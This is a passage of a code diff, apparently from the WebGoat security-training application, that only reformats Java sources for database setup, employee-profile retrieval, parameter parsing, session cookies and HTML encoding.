|
||||
answer_results.getInt("manager"),
|
||||
answer_results.getString("start_date"),
|
||||
answer_results.getInt("salary"),
|
||||
answer_results.getString("ccn"),
|
||||
answer_results.getInt("ccn_limit"),
|
||||
answer_results.getString("disciplined_date"),
|
||||
answer_results.getString("disciplined_notes"),
|
||||
answer_results.getString("personal_description"));
|
||||
/* System.out.println("Retrieved employee from db: " +
|
||||
profile.getFirstName() + " " + profile.getLastName() +
|
||||
" (" + profile.getId() + ")");
|
||||
profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"),
|
||||
answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results
|
||||
.getString("title"), answer_results.getString("phone"), answer_results
|
||||
.getString("address1"), answer_results.getString("address2"), answer_results
|
||||
.getInt("manager"), answer_results.getString("start_date"), answer_results
|
||||
.getInt("salary"), answer_results.getString("ccn"), answer_results
|
||||
.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
|
||||
.getString("disciplined_notes"), answer_results.getString("personal_description"));
|
||||
/*
|
||||
* System.out.println("Retrieved employee from db: " + profile.getFirstName() +
|
||||
* " " + profile.getLastName() + " (" + profile.getId() + ")");
|
||||
*/}
|
||||
}
|
||||
catch ( SQLException sqle )
|
||||
} catch (SQLException sqle)
|
||||
{
|
||||
s.setMessage("Error getting employee profile");
|
||||
sqle.printStackTrace();
|
||||
}
|
||||
}
|
||||
catch ( Exception e )
|
||||
} catch (Exception e)
|
||||
{
|
||||
s.setMessage("Error getting employee profile");
|
||||
e.printStackTrace();
|
||||
|
||||
@ -66,7 +66,8 @@ public class CreateDB
|
||||
try
|
||||
{
|
||||
String createTableStatement = "CREATE TABLE messages (" + "num int not null," + "title varchar(50),"
|
||||
+ "message varchar(200)," + "user_name varchar(50) not null, " + "lesson_type varchar(50) not null" + ")";
|
||||
+ "message varchar(200)," + "user_name varchar(50) not null, " + "lesson_type varchar(50) not null"
|
||||
+ ")";
|
||||
statement.executeUpdate(createTableStatement);
|
||||
} catch (SQLException e)
|
||||
{
|
||||
@ -319,6 +320,7 @@ public class CreateDB
|
||||
|
||||
/**
|
||||
* Create users whith tans
|
||||
*
|
||||
* @param connection
|
||||
* @throws SQLException
|
||||
*/
|
||||
@ -341,7 +343,8 @@ public class CreateDB
|
||||
{
|
||||
String createTableStatement = "CREATE TABLE user_data_tan (" + "userid int not null,"
|
||||
+ "first_name varchar(20)," + "last_name varchar(20)," + "cc_number varchar(30),"
|
||||
+ "cc_type varchar(10)," + "cookie varchar(20)," + "login_count int," + "password varchar(20)" +")";
|
||||
+ "cc_type varchar(10)," + "cookie varchar(20)," + "login_count int," + "password varchar(20)"
|
||||
+ ")";
|
||||
statement.executeUpdate(createTableStatement);
|
||||
} catch (SQLException e)
|
||||
{
|
||||
@ -361,6 +364,7 @@ public class CreateDB
|
||||
|
||||
/**
|
||||
* Create the Table for the tans
|
||||
*
|
||||
* @param connection
|
||||
* @throws SQLException
|
||||
*/
|
||||
@ -381,8 +385,8 @@ public class CreateDB
|
||||
// Create the new table
|
||||
try
|
||||
{
|
||||
String createTableStatement = "CREATE TABLE tan (" + "userid int not null,"
|
||||
+ "tanNr int," + "tanValue int" + ")";
|
||||
String createTableStatement = "CREATE TABLE tan (" + "userid int not null," + "tanNr int," + "tanValue int"
|
||||
+ ")";
|
||||
statement.executeUpdate(createTableStatement);
|
||||
} catch (SQLException e)
|
||||
{
|
||||
@ -403,7 +407,6 @@ public class CreateDB
|
||||
String insertData9 = "INSERT INTO tan VALUES (102,4,9458)";
|
||||
String insertData10 = "INSERT INTO tan VALUES (102,5,4879)";
|
||||
|
||||
|
||||
statement.executeUpdate(insertData1);
|
||||
statement.executeUpdate(insertData2);
|
||||
statement.executeUpdate(insertData3);
|
||||
|
||||
@ -927,7 +927,8 @@ public class ParameterParser
|
||||
// Validates format for major brands of credit card.
|
||||
// private static final String CCNREGEX =
|
||||
// "^(?:(?<Visa>4\\d{3})|(?<Mastercard>5[1-5]\\d{2})|(?<Discover>6011)|(?<DinersClub>(?:3[68]\\d{2})|(?:30[0-5]\\d))|(?<AmericanExpress>3[47]\\d{2}))([
|
||||
// -]?)(?(DinersClub)(?:\\d{6}\\1\\d{4})|(?(AmericanExpress)(?:\\d{6}\\1\\d{5})|(?:\\d{4}\\1\\d{4}\\1\\d{4})))$";
|
||||
//-]?)(?(DinersClub)(?:\\d{6}\\1\\d{4})|(?(AmericanExpress)(?:\\d{6}\\1\\d{5})|(?:\\d{4}\\1\\d{4
|
||||
// }\\1\\d{4})))$";
|
||||
private static final String CCNREGEX = "^\\d{16}$";
|
||||
|
||||
private static final Pattern Ccnpattern = Pattern.compile(CCNREGEX);
|
||||
|
||||
@ -456,10 +456,10 @@ public class WebSession
|
||||
if (showCookies()) cookies = Arrays.asList(request.getCookies());
|
||||
|
||||
/*
|
||||
* List cookies = new Vector(); HttpServletRequest request = getRequest(); Cookie[] cookies =
|
||||
* request.getCookies(); if ( cookies.length == 0 ) { list.addElement( new LI( "No Cookies" ) ); }
|
||||
* for ( int i = 0; i < cookies.length; i++ ) { Cookie cookie = cookies[i];
|
||||
* cookies.add(cookie); //list.addElement( new LI( cookie.getName() + " -> " +
|
||||
* List cookies = new Vector(); HttpServletRequest request = getRequest(); Cookie[] cookies
|
||||
* = request.getCookies(); if ( cookies.length == 0 ) { list.addElement( new LI(
|
||||
* "No Cookies" ) ); } for ( int i = 0; i < cookies.length; i++ ) { Cookie cookie =
|
||||
* cookies[i]; cookies.add(cookie); //list.addElement( new LI( cookie.getName() + " -> " +
|
||||
* cookie.getValue() ) ); }
|
||||
*/
|
||||
|
||||
@ -1004,8 +1004,8 @@ public class WebSession
|
||||
}
|
||||
|
||||
/**
|
||||
* @param header -
|
||||
* request header value to return
|
||||
* @param header
|
||||
* - request header value to return
|
||||
* @return
|
||||
*/
|
||||
public String getHeader(String header)
|
||||
|
||||
@ -92,7 +92,8 @@ public class WebgoatContext
|
||||
defuseOSCommands = "true".equals(getParameter(servlet, DEFUSEOSCOMMANDS));
|
||||
enterprise = "true".equals(getParameter(servlet, ENTERPRISE));
|
||||
codingExercises = "true".equals(getParameter(servlet, CODING_EXERCISES));
|
||||
feedbackAddressHTML = getParameter(servlet, FEEDBACK_ADDRESS_HTML) != null ? getParameter(servlet, FEEDBACK_ADDRESS_HTML)
|
||||
feedbackAddressHTML = getParameter(servlet, FEEDBACK_ADDRESS_HTML) != null ? getParameter(servlet,
|
||||
FEEDBACK_ADDRESS_HTML)
|
||||
: feedbackAddressHTML;
|
||||
feedbackAddress = getParameter(servlet, FEEDBACK_ADDRESS) != null ? getParameter(servlet, FEEDBACK_ADDRESS)
|
||||
: feedbackAddress;
|
||||
|
||||
@ -129,9 +129,9 @@ public class HtmlEncoder
|
||||
* <p>
|
||||
*
|
||||
* e.g. <tt>"bread" & "butter"</tt> => <tt>&quot;bread&quot; &amp;
|
||||
* &quot;butter&quot;</tt> .
|
||||
* Update: supports nearly all HTML entities, including funky accents. See the source code for
|
||||
* more detail. Adapted from http://www.purpletech.com/code/src/com/purpletech/util/Utils.java.
|
||||
* &quot;butter&quot;</tt> . Update: supports nearly all HTML entities, including funky
|
||||
* accents. See the source code for more detail. Adapted from
|
||||
* http://www.purpletech.com/code/src/com/purpletech/util/Utils.java.
|
||||
*
|
||||
* @param s1
|
||||
* Description of the Parameter
|
||||
|
||||
@ -59,7 +59,6 @@ public class Interceptor implements Filter
|
||||
|
||||
/*
|
||||
* (non-Javadoc)
|
||||
*
|
||||
* @see javax.servlet.Filter#destroy()
|
||||
*/
|
||||
public void destroy()
|
||||
@ -133,7 +132,6 @@ public class Interceptor implements Filter
|
||||
|
||||
/*
|
||||
* (non-Javadoc)
|
||||
*
|
||||
* @see javax.servlet.Filter#init(javax.servlet.FilterConfig)
|
||||
*/
|
||||
public void init(FilterConfig arg0) throws ServletException
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user